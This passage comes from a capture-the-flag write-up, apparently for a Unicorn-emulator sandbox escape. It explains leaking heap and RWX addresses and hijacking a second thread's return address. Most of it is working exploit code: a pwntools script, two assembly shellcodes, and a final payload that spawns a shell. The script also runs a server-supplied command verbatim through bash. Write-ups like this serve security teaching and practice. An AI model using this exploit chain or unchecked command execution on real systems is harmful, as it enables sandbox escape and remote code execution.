jz memcpy_done
memcpy_loop:
mov al, [rsi]
mov [rdi], al
inc rsi
inc rdi
dec rdx
jnz memcpy_loop
memcpy_done:
ret

evil:
mov eax, 4
xor ebx, ebx
mov ecx, 0x1000
int3
mov rbx, rax
mov eax,2
int3

Although it was not fixed with TLS as I expected, but I could leak the heap’s address and the JIT (RWX) address:
alt text

After have the leaked address, I created a new process which overwrote its trustzone to:

1
2
mov eax, 5
int3

This shellcode could let me call map_address directly, to read/write any host’s addresses I want.

Write the shellcode on where?

Up to this point, I leaked heap address, a RWX address.

First time, I had tried to overwrite the opcode of thread 2 to the shellcode spawns shell:
alt text

But the leaked RWX address is not fixed with the RIP of the second thread on the remote.

So I tried to leak the stack address of the second thread.

Because the shellcode and the execution are the same, I think the call stack of the remote process and the local one should be the same. Overwriting the second thread’s return address might be a good way.

I found that the second thread’s stack address could be leak via a pointer at heap+0x5b00.

alt text

After overwriting its return address, the final step is to make it return.

alt text

I saw it check if the local variable ($rbp-0x10) is negative or not.

Up to this point, the variable is always equal to 0 so the thread would never stop the loop ( I think because the end of my first shellcode is jmp $
).

Changing the variable to -1 ( you could see it in the heap segment and I had leaked the heap address before).

The second thread would return and execute our shellcode.

alt text

Final script

This is so f*cking long. I suggest you should debug yourself first.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
#!/usr/bin/env python
from pwn import *
from time import sleep
from os import popen

context.binary = e = ELF("chal")

gs = """
"""
def start():
    """Start the target and return the pwntools tube.

    LOCAL  -- run the binary locally with stderr discarded.
    REMOTE -- ``python x.py REMOTE <host> <port>``: connect and solve the
              proof of work printed by the server.

    Exits with a usage message when no mode is given.
    """
    if args.LOCAL:
        p = e.process(stderr=open("/dev/null", "w"))

    elif args.REMOTE:  # python x.py REMOTE <host> <port>
        host_port = sys.argv[1:]
        p = remote(host_port[0], int(host_port[1]))
        p.recvuntil(b'You can run the solver with:\n')
        cmd = p.recvline().decode()
        log.info(cmd)
        # The proof-of-work command is sent by the server and run verbatim.
        ans = popen(f"bash -c '{cmd}'").read()
        p.sendlineafter(b'Solution? ', ans.encode())
    else:
        raise SystemExit("usage: x.py LOCAL | REMOTE <host> <port>")
    return p

code1 = asm(open("shellcode1.asm", "r").read())+b'\x90'*0x40
data1 = p32(4) # UC_ARCH_X86
data1 += p32(1 << 3) # UC_MODE_64
data1 += (
p64(0x13370000) + p64(0x1000) +
p64(0x13380000) + p64(0x1000) +
p64(0x13390000) + p64(0x1000) +
p64(0x133a0000) + p64(0x2000)
)
data1 += p16(len(code1))
data1 += p8(3)
data1 = data1.ljust(0x50, b'\0')

p = start()

p.send(data1)
p.sendafter(b"CODE_START\n", code1)
p.recvuntil(b'new process created with pid 0\n')
p.recvuntil(b'0\n')
buf0 = int(p.recvline().decode())
log.info(hex(buf0))

code2 = asm(open("shellcode2.asm", "r").read().replace("leaked_address", str(buf0+0xf000))) + b'\x90'*0x20 + asm(shellcraft.sh())

data2 = p32(4) # UC_ARCH_X86
data2 += p32(1 << 3) # UC_MODE_64
data2 += (
p64(0x13470000) + p64(0x1000) +
p64(0x13380000) + p64(0x1000) +
p64(0x13390000) + p64(0x1000) +
p64(0x133a0000) + p64(0x2000)
)
data2 += p16(len(code2))
data2 += p8(3)
data2 = data2.ljust(0x50, b'\0')

if args.GDB:
gdb.attach(p, gdbscript=gs)
pause()

p.send(data2)
p.sendafter(b"CODE_START\n", code2)
p.interactive()

shellcode1:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
mov rsp, 0x13380800
mov r10, 0x13390000

mov rax, 3
mov rbx, 0xf000
int3
// calloc 0xf000


mov rax, 8
mov rbx, 0x42420000
lea rcx, [rip+memprot_x86_64]
int3

mov rax, 10
mov rbx, 0x42420000
mov rcx, 0x1000
mov rdx, 7
lea rdi, [rip+password_buffer]
int3

mov rbx, rax
mov rax, 2
int3

mov rdi, 0x42420000
lea rsi, [rip+evil]
mov edx, 0x20
call memcpy

mov eax,10
int3

jmp $

map_shared_x86_64:
.asciz "map_shared_x86_64"
memprot_x86_64:
.asciz "memprot_x86_64"

password_buffer:
.asciz "sup3r_s3cure_sj\0"
password:
.asciz "password"
newline:
.asciz "\n"
nop

memcpy:
test rdx, rdx
jz memcpy_done
memcpy_loop:
mov al, [rsi]
mov [rdi], al
inc rsi
inc rdi
dec rdx
jnz memcpy_loop
memcpy_done:
ret

evil:
mov eax, 4
xor ebx, ebx
mov ecx, 0x1000
int3
mov rbx, rax
mov eax,2
int3

shellcode2:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
mov rax, 8
mov rbx, 0x42420000
lea rcx, [rip+memprot_x86_64]
int3

mov rax, 10
mov rbx, 0x42420000
mov rcx, 0x1000
mov rdx, 7
lea rdi, [rip+password_buffer]
int3

mov rbx, rax
mov rax, 2
int3

mov rdi, 0x42420000
mov edx, 1
mov ecx, 0x10
l:
mov rax, 0x9090909090909090
mov qword ptr [rdi+8*rdx], rax
inc edx
loop l

lea rsi, [rip+evil]
mov edx, 6
mov rsp, 0x13380f00
call memcpy

mov eax,10
mov rbx, 0xdead000
mov rcx, 0x10000
mov rdx, leaked_address
int3

mov r10, 0xdead000
mov r8, qword ptr [r10+0x10]
lea r9, [r8-0x1a0]

mov rbx, r9
mov eax,2
int3

mov r11, qword ptr [r10+0x60]
sub r11, 0x41f0
mov rbx, r11
mov eax,2
int3
//heap


mov eax,10
mov rbx,0xdeadbeef000
mov rcx, 0xf000
mov rdx, r9
int3

mov rdi, 0xdeadbeef000
lea rsi, [rip+final]
mov rdx, 0x80
call qmemcpy

push r11
mov eax,10
mov rbx,0xdeaddead000
mov rcx, 0xb0000
mov rdx, r11
int3
pop r11

mov r11,0xdeaddead000
mov r12, qword ptr [r11+0x5b00]
sub r12,0x1630

mov rbx, r12
mov eax,2
int3


mov eax,10
mov rbx, 0x12345000
mov rcx, 0xf000
mov rdx, r12
int3


mov rbx, r9
mov eax,2
int3

mov r12, 0x12345000
mov qword ptr [r12+0xd38], r9
mov qword ptr [r11+0x3fc90], -1
jmp $

memprot_x86_64:
.asciz "memprot_x86_64"
password_buffer:
.asciz "sup3r_s3cure_sj\\0"
password:
.asciz "password"

memcpy:
test rdx, rdx
jz memcpy_done
memcpy_loop:
mov al, [rsi]
mov [rdi], al
inc rsi
inc rdi
dec rdx
jnz memcpy_loop
memcpy_done:
ret

// qmemcpy: copy rdx bytes from [rsi] to [rdi]; clobbers rax, rsi, rdi, rdx.
// NOTE: both branches target the byte-wise memcpy labels rather than the
// qmemcpy_* ones.  The effect is that the first 8 bytes are copied as one
// qword and the remaining rdx-8 bytes are copied one byte at a time by
// memcpy_loop.  This is only correct for rdx = 0 or rdx >= 8 (the caller
// passes 0x80); the qmemcpy_loop and qmemcpy_done labels are never jumped to.
qmemcpy:
test rdx, rdx
jz memcpy_done
qmemcpy_loop:
mov rax, [rsi]
mov [rdi], rax
add rsi,8
add rdi,8
sub rdx,8
jnz memcpy_loop
qmemcpy_done:
ret

evil:
mov eax, 5
int3

final: